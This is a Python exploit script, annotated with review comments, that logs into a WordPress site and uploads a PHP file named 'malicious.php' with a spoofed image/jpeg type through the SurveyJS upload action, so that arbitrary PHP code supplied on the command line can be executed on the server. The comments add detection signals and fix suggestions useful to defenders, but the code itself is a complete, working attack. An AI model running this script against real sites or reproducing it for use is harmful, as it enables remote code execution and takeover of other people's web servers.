import requests
import argparse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning for the whole process.
# NOTE(review): both requests in upload_file() are sent with verify=False, so
# the WordPress credentials travel over a connection whose certificate is never
# checked; suppressing the warning also removes the only runtime reminder of it.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def upload_file(url, username, password, php_code):
    """Log in to a WordPress site and POST a PHP file to the SurveyJS upload action.

    The function authenticates against ``wp-login.php``, then sends a multipart
    request to ``wp-admin/admin-ajax.php`` with ``action=SurveyJS_UploadFiles``.
    The uploaded part is named ``malicious.php`` but declares the content type
    ``image/jpeg``. On an HTTP 200 reply, the JSON value stored under the key
    ``malicious.php`` is printed.

    Args:
        url: Base URL of the WordPress site; paths are appended to it as-is.
        username: WordPress account name sent in the ``log`` form field.
        password: WordPress password sent in the ``pwd`` form field.
        php_code: Text placed between ``<?php`` and ``?>`` in the uploaded file.

    Returns:
        None. Every outcome is reported with ``print``.

    Review notes:
        * The request shape is the detection signal for defenders: an
          authenticated POST to ``admin-ajax.php`` whose ``action`` is
          ``SurveyJS_UploadFiles`` and whose file part has a ``.php`` name.
        * Presumably the server-side handler stores the file under its
          client-supplied name and does not restrict the extension; confirm
          against the plugin's advisory. The fix belongs in that handler
          (extension allow-list, non-executable upload directory), not in
          trusting the declared MIME type.
        * ``verify=False`` disables certificate checking on both requests,
          including the one that carries the credentials.
    """
    http = requests.Session()

    # Form fields in the order the original script sends them.
    credentials_form = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': url + '/wp-admin/',
        'testcookie': '1'
    }
    http.post(f"{url}/wp-login.php", data=credentials_form, verify=False)

    # The login reply itself is not inspected; success is inferred solely from
    # a cookie whose name contains 'wordpress_logged_in' appearing in the jar.
    authenticated = False
    for jar_entry in http.cookies:
        if 'wordpress_logged_in' in jar_entry.name:
            authenticated = True
            break
    if not authenticated:
        print("Login failed. Check your credentials.")
        return

    print("Login successful.")

    # Multipart body: a plain 'action' field plus the file part. The declared
    # content type (image/jpeg) does not match the .php file name.
    multipart_fields = {
        'action': (None, 'SurveyJS_UploadFiles'),
        'file': ('malicious.php', f'<?php {php_code} ?>', 'image/jpeg')
    }
    reply = http.post(f"{url}/wp-admin/admin-ajax.php", files=multipart_fields, verify=False)

    if reply.status_code != 200:
        print("Failed to upload file. Status code:", reply.status_code)
        return

    # NOTE(review): HTTP 200 is reported as success before the body is read, so
    # this message alone does not prove the file was stored.
    print("File uploaded successfully.")
    try:
        parsed = reply.json()
        # A JSON reply without this key raises KeyError, which is not caught here.
        print(parsed["malicious.php"])
    except json.JSONDecodeError:
        print("Failed to parse JSON response.")
        print("Response text:", reply.text)
if __name__ == "__main__":
    # Command-line entry point: three positional arguments plus an optional
    # --code string, all forwarded unchanged to upload_file().
    # NOTE(review): the password is a positional argument, so it is visible in
    # shell history and in the process list while the script runs.
    cli = argparse.ArgumentParser(description='Upload a PHP file to a WordPress site.')
    positional_help = (
        ('url', 'The URL of the WordPress site (e.g., http://example.com)'),
        ('username', 'Your WordPress username'),
        ('password', 'Your WordPress password'),
    )
    for arg_name, arg_help in positional_help:
        cli.add_argument(arg_name, type=str, help=arg_help)
    cli.add_argument('--code', type=str, default='Arbitrary PHP code execution', help='PHP code to execute')

    opts = cli.parse_args()
    upload_file(opts.url, opts.username, opts.password, opts.code)